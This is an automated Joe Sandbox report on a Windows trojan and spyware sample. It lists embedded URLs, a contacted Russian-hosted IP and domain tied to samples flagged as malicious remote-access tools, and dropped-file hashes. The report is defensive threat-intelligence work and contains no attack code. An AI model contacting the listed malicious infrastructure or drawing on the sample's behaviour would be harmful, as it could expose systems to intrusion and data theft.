http://www.uvnc.comopenhttp://forum.uvnc.comnet	mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	high
http://java.sun.com/products/plugin/index.html#download	mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	high
http://forum.uvnc.com	mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	unknown
http://ocsp.thawte.com0	mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.190.152.201	tbdcic.info	Russian Federation		41615	RSHB-ASRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579875
Start date and time:	2024-12-23 13:36:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mSRW5AfJpC.exe renamed because original name is a hash value
Original Sample Name:	41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c.exe
Detection:	MAL
Classification:	mal84.troj.spyw.evad.winEXE@56/60@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 54.224.241.105, 18.213.11.84, 50.16.47.176, 34.237.241.83, 23.195.39.65, 199.232.214.172, 184.30.20.134, 23.32.239.56, 2.19.198.27, 13.107.246.63, 23.218.208.109, 52.6.155.20, 4.245.163.56
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: mSRW5AfJpC.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
194.190.152.201	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tbdcic.info	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
bg.microsoft.map.fastly.net	q8b3OisMC4.dll	Get hash	malicious	Unknown	Browse	199.232.210.172
	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse	199.232.210.172
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	199.232.210.172
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	199.232.210.172
	eszstwQPwq.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	0vM02qWRT9.ps1	Get hash	malicious	LockBit ransomware, Metasploit	Browse	199.232.210.172
	#U5b89#U88c5#U52a9#U624b_2.0.8.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	fiFdIrd.txt.js	Get hash	malicious	Unknown	Browse	199.232.210.172
	5XXofntDiN.exe	Get hash	malicious	LummaC	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RSHB-ASRU	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse	194.190.152.201
	Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	document.jpg.lnk	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	tiago.exe	Get hash	malicious	Reverse SSH	Browse	194.190.152.129
	0EZ9Ho3Ruc.exe	Get hash	malicious	RedLine	Browse	194.190.152.148
	Paralysis Hack.exe	Get hash	malicious	zgRAT	Browse	194.190.153.137

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse
	T8xrZb7nBL.exe	Get hash	malicious	UltraVNC	Browse
	Olz7TmvkEW.exe	Get hash	malicious	UltraVNC	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.205481673456694
Encrypted:	false
SSDEEP:	6:fCcM+q2P92nKuAl9OmbnIFUt8ncZmw+nXMVkwO92nKuAl9OmbjLJ:U+v4HAahFUt8c/+cV5LHAaSJ
MD5:	839ECAE182A0DB7C5B9A187954F494C1
SHA1:	7E993CB669F8661C70A1F63FB9AF3FADA155E21B
SHA-256:	CF086064D29AB51BDFCE177403558FCF1A10D598BF4D90DBAC4E2C6E1B17EC65
SHA-512:	6B9FBEB718EAFF5B189696C901A6FAC25EFE27BFF82FA3E3322FC6815829D27614D62F193D33FB97CD43DC11651C84BDA91501FFE3DE2A3CB87B8BFF7E64E7A6
Malicious:	false
Preview:	2024/12/23-07:37:26.998 51c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:27.002 51c Recovering log #3.2024/12/23-07:37:27.002 51c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.205481673456694
Encrypted:	false
SSDEEP:	6:fCcM+q2P92nKuAl9OmbnIFUt8ncZmw+nXMVkwO92nKuAl9OmbjLJ:U+v4HAahFUt8c/+cV5LHAaSJ
MD5:	839ECAE182A0DB7C5B9A187954F494C1
SHA1:	7E993CB669F8661C70A1F63FB9AF3FADA155E21B
SHA-256:	CF086064D29AB51BDFCE177403558FCF1A10D598BF4D90DBAC4E2C6E1B17EC65
SHA-512:	6B9FBEB718EAFF5B189696C901A6FAC25EFE27BFF82FA3E3322FC6815829D27614D62F193D33FB97CD43DC11651C84BDA91501FFE3DE2A3CB87B8BFF7E64E7A6
Malicious:	false
Preview:	2024/12/23-07:37:26.998 51c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:27.002 51c Recovering log #3.2024/12/23-07:37:27.002 51c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.1628517052993415
Encrypted:	false
SSDEEP:	6:eBjyq2P92nKuAl9Ombzo2jMGIFUt8n91Zmw+nrRkwO92nKuAl9Ombzo2jMmLJ:jv4HAa8uFUt891/+d5LHAa8RJ
MD5:	11BA3AE7E483A7F0375CE949B966CCF3
SHA1:	6EAD4D00F6D8EFC624032BE68C6F2DD4F06A5C5F
SHA-256:	982703FB93CFACC84937FDBC738C84AEB36C7A9637E7695F04CE3965C02DA4B6
SHA-512:	734E31024DFDD3AFBAF045EADC41309821B5BD128DFC5B536FF270005994A457F443496138EEB8AB92AD71DCBA86808ADB803075D529D058D2B409BFAB3DDD3F
Malicious:	false
Preview:	2024/12/23-07:37:27.085 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:27.087 1c50 Recovering log #3.2024/12/23-07:37:27.087 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.1628517052993415
Encrypted:	false
SSDEEP:	6:eBjyq2P92nKuAl9Ombzo2jMGIFUt8n91Zmw+nrRkwO92nKuAl9Ombzo2jMmLJ:jv4HAa8uFUt891/+d5LHAa8RJ
MD5:	11BA3AE7E483A7F0375CE949B966CCF3
SHA1:	6EAD4D00F6D8EFC624032BE68C6F2DD4F06A5C5F
SHA-256:	982703FB93CFACC84937FDBC738C84AEB36C7A9637E7695F04CE3965C02DA4B6
SHA-512:	734E31024DFDD3AFBAF045EADC41309821B5BD128DFC5B536FF270005994A457F443496138EEB8AB92AD71DCBA86808ADB803075D529D058D2B409BFAB3DDD3F
Malicious:	false
Preview:	2024/12/23-07:37:27.085 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:27.087 1c50 Recovering log #3.2024/12/23-07:37:27.087 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8e6e7dde-55aa-49f1-a672-32ad6e844e75.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5478e0.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\df43cf0e-0d59-4506-89e0-f7ed7c156fb3.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	508
Entropy (8bit):	5.049595250123284
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq7msBdOg2HSgcaq3QYiubxnP7E4TfF+:Y2sRdsCdMHSL3QYhbxP7np+
MD5:	EB764BE1D8D595C8BB167B67CB9E8688
SHA1:	D3C0E5EE044797EDE653F82391A632FA3F9B7343
SHA-256:	6251E339AC071F85C63546710DB29700546E7EFC386F05056C35703EE336AF3D
SHA-512:	F7A46A31EDDCB435D06F220C14D56E530052377A8302A15630D823CC3955E1A1C9AFFA14B77AC10B5C0636A846F5B7D1C3CC1D17900D547AE47B02F5E8845122
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517455315922","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":774382},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.239246320563115
Encrypted:	false
SSDEEP:	96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUVB/+L:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLL
MD5:	0D2EFE01099EB88ED1702787A71DC6A3
SHA1:	9F7F75ED4E2838AD2E59F795F132F4028CAFD398
SHA-256:	0D2D72832B56D057C4A21CC533E29C43EF5144731D2704CA6995397F9CDBFB5B
SHA-512:	63B4037E170E50119E28064007D75EB41D4AAEC4E4CD8D7ABB4EC5ED9AA2A8885874CFE2911241DF48BBFBD772CC215DDD09D38344A11A65AF8E0751C274FD7A
Malicious:	false
Preview:	*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.\|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.181806206597494
Encrypted:	false
SSDEEP:	6:5lyq2P92nKuAl9OmbzNMxIFUt8jNL1Zmw+jDURkwO92nKuAl9OmbzNMFLJ:5Iv4HAa8jFUt8pL1/+fU5LHAa84J
MD5:	B3B38E9FBA8BD1D2BA123D1E7FF11173
SHA1:	00D096516E7A07FDE7977727DC55152FFFF2AA6D
SHA-256:	FBBB202CE9299A2D0A7002C2DD8A7378B9595B51F4F64F311D5F4AF349E950D1
SHA-512:	E3A2BC22F81B1C1F76BBDDDC8E07DEA5D01D1384C7FA45206A8633737BE5318BFAC7DDCFE93668738E517397950EA7396646BACEBEB7767F065075E574FFFD45
Malicious:	false
Preview:	2024/12/23-07:37:27.389 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:27.403 1c50 Recovering log #3.2024/12/23-07:37:27.442 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.181806206597494
Encrypted:	false
SSDEEP:	6:5lyq2P92nKuAl9OmbzNMxIFUt8jNL1Zmw+jDURkwO92nKuAl9OmbzNMFLJ:5Iv4HAa8jFUt8pL1/+fU5LHAa84J
MD5:	B3B38E9FBA8BD1D2BA123D1E7FF11173
SHA1:	00D096516E7A07FDE7977727DC55152FFFF2AA6D
SHA-256:	FBBB202CE9299A2D0A7002C2DD8A7378B9595B51F4F64F311D5F4AF349E950D1
SHA-512:	E3A2BC22F81B1C1F76BBDDDC8E07DEA5D01D1384C7FA45206A8633737BE5318BFAC7DDCFE93668738E517397950EA7396646BACEBEB7767F065075E574FFFD45
Malicious:	false
Preview:	2024/12/23-07:37:27.389 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:27.403 1c50 Recovering log #3.2024/12/23-07:37:27.442 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223123732Z-203.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	2.436424201832609
Encrypted:	false
SSDEEP:	384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
MD5:	EDF4BC620FE407C6970CDAF5585ADE74
SHA1:	FF838C5205409B571B5FA183F69EEAAE321F9AE6
SHA-256:	9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
SHA-512:	84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
